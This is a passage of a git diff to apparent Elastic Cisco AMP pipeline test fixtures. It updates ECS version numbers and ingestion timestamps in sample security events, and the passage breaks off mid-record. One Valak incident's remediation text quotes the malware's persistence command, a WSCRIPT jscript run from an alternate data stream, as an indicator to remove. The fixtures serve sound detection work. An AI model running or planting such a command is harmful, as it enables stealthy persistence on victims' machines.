                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:30:41.000Z",
@@ -3548,7 +3548,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3568,7 +3568,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-12T17:32:35.701418Z",
+                "ingested": "2021-09-13T18:06:29.783811789Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:02:27.000Z",
@@ -3647,7 +3647,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3667,7 +3667,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-12T17:32:35.701419883Z",
+                "ingested": "2021-09-13T18:06:29.783813851Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:02:26.000Z",
@@ -3746,7 +3746,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3766,7 +3766,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-12T17:32:35.701421764Z",
+                "ingested": "2021-09-13T18:06:29.783815980Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}",
                 "kind": "alert",
                 "start": "2020-12-25T04:32:53.000Z",
@@ -3864,7 +3864,7 @@
         {
             "@timestamp": "2020-12-25T04:22:45.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3882,7 +3882,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:35.701423630Z",
+                "ingested": "2021-09-13T18:06:29.783818038Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6525498672153625000",
                 "kind": "alert"
@@ -3919,7 +3919,7 @@
         {
             "@timestamp": "2020-12-25T04:07:21.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3937,7 +3937,7 @@
             "event": {
                 "severity": 0,
                 "action": "Scan Completed, No Detections",
-                "ingested": "2021-09-12T17:32:35.701425510Z",
+                "ingested": "2021-09-13T18:06:29.783820119Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}",
                 "id": "6525494703603843000",
                 "kind": "alert"
@@ -3982,7 +3982,7 @@
         {
             "@timestamp": "2020-12-25T04:06:40.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4000,7 +4000,7 @@
             "event": {
                 "severity": 0,
                 "action": "Scan Started",
-                "ingested": "2021-09-12T17:32:35.701427375Z",
+                "ingested": "2021-09-13T18:06:29.783822173Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}",
                 "id": "6525494527510184000",
                 "kind": "alert"
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
similarity index 98%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
index a4bddd0ecca..76d410f5e5b 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json
@@ -3,7 +3,7 @@
         {
             "@timestamp": "2021-01-15T11:59:52.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -21,7 +21,7 @@
             "event": {
                 "severity": 4,
                 "action": "SecureX Threat Hunting Incident",
-                "ingested": "2021-09-12T17:31:04.469612451Z",
+                "ingested": "2021-09-13T18:06:41.546081683Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n    - Review all activity performed by the user\\r\\n    - Upload any suspicious files to ThreatGrid for analysis\\r\\n    - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n    - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
                 "kind": "alert"
             },
@@ -173,7 +173,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -205,7 +205,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469616802Z",
+                "ingested": "2021-09-13T18:06:41.546087563Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat 